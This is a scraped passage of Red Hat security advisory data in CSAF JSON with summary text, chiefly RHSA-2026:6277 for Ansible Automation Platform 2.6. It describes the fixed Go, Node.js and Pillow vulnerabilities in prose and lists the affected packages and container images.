"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
}
]
}
RHSA-2026:6277
Vulnerability from csaf_redhat - Published: 2026-03-31 16:12 - Updated: 2026-04-16 11:09A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application's failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.6\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-gateway-proxy: Unexpected session resumption in crypto/tls (CVE-2025-68121)\n* automation-gateway-proxy: Memory exhaustion in query parameter parsing in net/url (CVE-2025-61726)\n* automation-platform-ui: SVGO: Denial of Service via XML entity expansion (CVE-2026-29074)\n* automation-platform-ui: Minimatch: Denial of Service via catastrophic backtracking in glob expressions (CVE-2026-27904)\n* automation-platform-ui: ReDoS via $data reference (CVE-2025-69873)\n* automation-platform-ui: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)\n* python3.12-pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image (CVE-2026-25990)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nIMPORTANT: All users must download the latest version of the installer. Attempting to install or upgrade with a previous version of the installer could result in failure.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6277",
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/html/release_notes/patch_releases"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade"
},
{
"category": "external",
"summary": "2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "2445132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6277.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.6 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2026-04-16T11:09:10+00:00",
"generator": {
"date": "2026-04-16T11:09:10+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6277",
"initial_release_date": "2026-03-31T16:12:45+00:00",
"revision_history": [
{
"date": "2026-03-31T16:12:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-31T16:12:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:10+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.6::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Inside-1.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.6::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el10"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.6::el10"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.src",
"product": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.src",
"product_id": "aap-metrics-utility-0:0.6.3-3.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.6.3-3.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"product": {
"name": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"product_id": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-ansible-base@2.6.20260325-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.1.1-1.el9ap.src",
"product": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.src",
"product_id": "python3.12-pillow-0:12.1.1-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.1.1-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"product": {
"name": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"product_id": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulp-ansible@0.25.4-1.el9ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"product": {
"name": "python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"product_id": "python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.54-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-filter-0:25.2-1.el9ap.src",
"product": {
"name": "python3.12-django-filter-0:25.2-1.el9ap.src",
"product_id": "python3.12-django-filter-0:25.2-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django-filter@25.2-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.src",
"product": {
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.src",
"product_id": "python3.12-asgiref-0:3.11.1-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-asgiref@3.11.1-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-channels-0:4.3.2-1.el9ap.src",
"product": {
"name": "python3.12-channels-0:4.3.2-1.el9ap.src",
"product_id": "python3.12-channels-0:4.3.2-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-channels@4.3.2-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"product": {
"name": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"product_id": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-drf-spectacular@0.29.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-django-0:5.2.12-1.el9ap.src",
"product": {
"name": "python3.12-django-0:5.2.12-1.el9ap.src",
"product_id": "python3.12-django-0:5.2.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-django@5.2.12-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.16.17-1.el9ap.src",
"product": {
"name": "ansible-core-1:2.16.17-1.el9ap.src",
"product_id": "ansible-core-1:2.16.17-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.16.17-1.el9ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-1.el9ap.src",
"product": {
"name": "receptor-0:1.6.4-1.el9ap.src",
"product_id": "receptor-0:1.6.4-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-platform-ui-0:2.6.7-1.el9ap.src",
"product": {
"name": "automation-platform-ui-0:2.6.7-1.el9ap.src",
"product_id": "automation-platform-ui-0:2.6.7-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-platform-ui@2.6.7-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.14-1.el9.src",
"product": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.src",
"product_id": "automation-gateway-proxy-0:2.6.14-1.el9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.14-1.el9?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.2.7-1.el9ap.src",
"product": {
"name": "automation-eda-controller-0:1.2.7-1.el9ap.src",
"product_id": "automation-eda-controller-0:1.2.7-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.2.7-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.11.7-1.el9ap.src",
"product": {
"name": "automation-hub-0:4.11.7-1.el9ap.src",
"product_id": "automation-hub-0:4.11.7-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.11.7-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-rulebook-0:1.2.2-1.el9ap.src",
"product": {
"name": "ansible-rulebook-0:1.2.2-1.el9ap.src",
"product_id": "ansible-rulebook-0:1.2.2-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-rulebook@1.2.2-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.10-2.el9ap.src",
"product": {
"name": "automation-controller-0:4.7.10-2.el9ap.src",
"product_id": "automation-controller-0:4.7.10-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.10-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.6.20260325-2.el9ap.src",
"product": {
"name": "automation-gateway-0:2.6.20260325-2.el9ap.src",
"product_id": "automation-gateway-0:2.6.20260325-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.6.20260325-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"product": {
"name": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"product_id": "ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-automation-platform-installer@2.6-6.1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"product": {
"name": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"product_id": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.11.7-2.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"product": {
"name": "python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"product_id": "python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulp-container@2.19.8-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-core-2:2.16.17-2.el10ap.src",
"product": {
"name": "ansible-core-2:2.16.17-2.el10ap.src",
"product_id": "ansible-core-2:2.16.17-2.el10ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.16.17-2.el10ap?arch=src\u0026epoch=2"
}
}
},
{
"category": "product_version",
"name": "python-asgiref-0:3.11.1-2.el10ap.src",
"product": {
"name": "python-asgiref-0:3.11.1-2.el10ap.src",
"product_id": "python-asgiref-0:3.11.1-2.el10ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-asgiref@3.11.1-2.el10ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-django-0:5.2.12-2.el10ap.src",
"product": {
"name": "python-django-0:5.2.12-2.el10ap.src",
"product_id": "python-django-0:5.2.12-2.el10ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-django@5.2.12-2.el10ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-2.el10ap.src",
"product": {
"name": "receptor-0:1.6.4-2.el10ap.src",
"product_id": "receptor-0:1.6.4-2.el10ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-2.el10ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"product_id": "aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.6.3-3.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"product_id": "python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.1.1-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"product_id": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.1.1-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"product_id": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.1.1-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.4-1.el9ap.x86_64",
"product": {
"name": "receptor-0:1.6.4-1.el9ap.x86_64",
"product_id": "receptor-0:1.6.4-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.4-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"product": {
"name": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"product_id": "receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.4-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"product": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"product_id": "receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.4-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"product": {
"name": "automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"product_id": "automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.14-1.el9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"product_id": "automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.14-1.el9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.14-1.el9?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.14-1.el9?arch=x86_64"
}
}
},
{
"category": "product_version",
